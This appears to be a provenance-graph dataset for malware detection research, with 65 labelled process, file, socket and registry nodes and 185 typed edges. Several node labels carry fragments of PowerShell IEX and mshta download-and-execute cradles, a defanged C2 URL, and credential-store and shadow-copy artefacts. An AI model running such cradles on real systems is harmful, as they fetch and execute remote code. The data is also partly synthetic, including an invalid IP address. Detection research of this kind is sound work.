65
MP-OneDrive.exe 
MF-C:\Windows\system32\vssvc
MF-\Windows\System32\regsvr32.exe
MF-\Users\User\30802.ico.vb
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MP-powershell.exe
SO-42.021.871.591
MF-softwarelagswitchc.exe
MF-C:\Users\admin\AppData\Local\Temp\SUNATfacturanopagada.zip
MP-nsCFA0.tmp
SF-HKCU\Software\Microsoft\Office\16.0\Outlook\WebView\Inbox
MF-notepad.m
MF-pasalaganando.c
MP-DllHost.exe 
MP-Skype.exe 
MP-Mavinject.exe
MP-Ürünla_fiyat 10243975_formu scann..10 adet.exe
TP-Register-CimProvider.exe
SF-C:\Users\admin\Desktop\Emergency
MF-\Users\admin\AppData\Local\Temp\IXP000.TMP\z9673002.exe
MP-z9673002.exe
MP-n4054738.exe
MP-jsc.exe
MF-dark.exe
MF-\Users\admin\AppData\Local\Temp\nsf91FB.tmp\ns98F0.tmp
MF-C:\Users\admin\AppData\Local\Temp\is-170NV.tmp
MP-AcroRd32.exe
MP-malware.exe 
MF-CSIDL_COMMON_APPDATA\anydesk.exe
SO-192.168.1.1
TF-xxxFile.cs
MF-\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\IMEDICTUPDATE.exe
MF-C:\Program Files\PC Cleaner\PCCNotifications
MF-C:\Users\admin\AppData\Local\Temp\is-4LLB1.tmp
MF-%temp%\sam
MP*-Setup.exe
TP-ns9A6A.tmp 
MF-C:\Users\admin\AppData\Local\Temp\z1Emir
TP-jww825a.exe 
SO-http://go.microsoft.com/fwlink/?LinkId=57426&Ext=php
TP*-C3B1.exe
SO-file://PathToAtomicsFolder\T1137.004\src\T1137.004.html
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close
TF-C:\Users\admin\Desktop\readme
MF-C:\Users\admin\AppData\Local\Hydro\Hydro
MP-PowerShell.exe
MP*-InstallUtil.exe
MP-radmin scanner.exe 
MP-bcdedit.exe
MP-data.exe
MP-SecuriteInfo.com
MP-keydlls.exe
TF-C:\Users\admin\Downloads\MincedCrackexe_cyb3a
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt
TF-\Windows\System32\runas.exe
TP-Scan20230717_newshipment 202333pdf.exe
TP-601f2b22a16a96c9ddaae24e2c5611f2.exe 
MP-vlc.exe
SO-hxxp://68.183.9[.]9/get.php
MF-\Users\admin\AppData\Local\Temp\tmp52BE.tmp
MP-AnyDesk-a444ebcf.exe 
TP*-vssadmin.exe
MP-wmpnscfg.exe
SO-http://www.velux.de/ueber-velux/datenschutz
MF-TEMP\T1059.007.out.txt
185
0 1 WR
0 2 WR
0 3 WR
0 4 ST
0 5 FR
5 1 WR
5 2 RD
5 3 WR
5 4 ST
0 6 ST
5 6 ST
0 7 WR
5 7 WR
0 8 RD
5 8 RD
0 9 UK
5 10 RD
5 11 WR
5 12 WR
13 3 RD
13 4 ST
5 13 UK
4 14 RF
6 14 RF
14 7 RD
14 8 RD
14 10 EX
14 11 WR
14 12 WR
15 6 ST
15 7 RD
15 8 UK
16 6 ST
16 7 RD
16 10 WR
16 11 WR
16 12 RD
14 16 UK
17 7 WR
17 10 WR
17 11 WR
17 12 RD
17 18 WR
17 19 WR
20 10 CD
20 11 WR
20 12 WR
17 20 UK
21 11 UK
22 12 WR
22 18 RD
22 19 EX
22 23 WR
22 24 RD
22 25 WR
26 18 WR
26 19 RD
26 23 RD
26 24 WR
26 25 WR
27 18 WR
27 19 WR
27 23 CD
27 24 WR
27 25 RD
22 28 EX
26 28 WR
27 28 RD
29 22 RF
26 29 ST
29 27 RF
22 30 RD
26 30 RD
27 30 WR
22 31 RD
26 31 CD
27 31 RD
22 32 WR
26 32 UK
27 33 RD
27 34 RD
35 25 RD
35 28 RD
35 29 ST
35 30 WR
35 31 WR
35 33 WR
35 34 WR
27 36 IJ
36 28 WR
36 29 ST
36 30 WR
36 31 WR
36 33 EX
36 34 UK
27 37 WR
35 37 WR
38 28 RD
38 29 ST
38 30 WR
38 31 RD
38 33 WR
35 38 IJ
38 37 WR
39 35 RF
38 39 ST
40 31 RD
40 33 WR
40 37 WR
38 40 IJ
40 39 ST
38 41 ST
41 40 RF
38 42 ST
42 40 RF
38 43 EX
40 43 WR
38 44 WR
40 44 EX
45 37 RD
38 45 IJ
45 39 ST
40 45 UK
46 37 WR
38 46 IJ
39 46 RF
46 41 ST
42 46 RF
46 43 EX
46 44 RD
38 47 FR
39 47 RF
47 41 ST
47 42 ST
47 43 EX
47 44 WR
46 47 UK
48 39 ST
41 48 RF
42 48 RF
48 43 WR
48 44 WR
41 49 RF
42 49 RF
49 43 CD
49 44 RD
48 49 UK
50 41 ST
50 42 ST
50 43 RD
50 44 RD
41 51 RF
42 51 RF
51 43 RD
51 44 WR
50 52 RD
51 52 WR
53 50 RF
51 53 ST
50 54 UK
51 55 FR
55 52 RD
53 55 RF
51 56 IJ
56 52 CD
53 56 RF
55 56 UK
51 57 FR
57 52 EX
57 53 ST
51 58 ST
58 57 RF
51 59 RD
57 59 RD
51 60 UK
61 52 WR
53 61 RF
57 61 IJ
58 61 RF
61 59 EX
62 52 RD
53 62 RF
57 62 UK
61 63 ST
61 64 UK

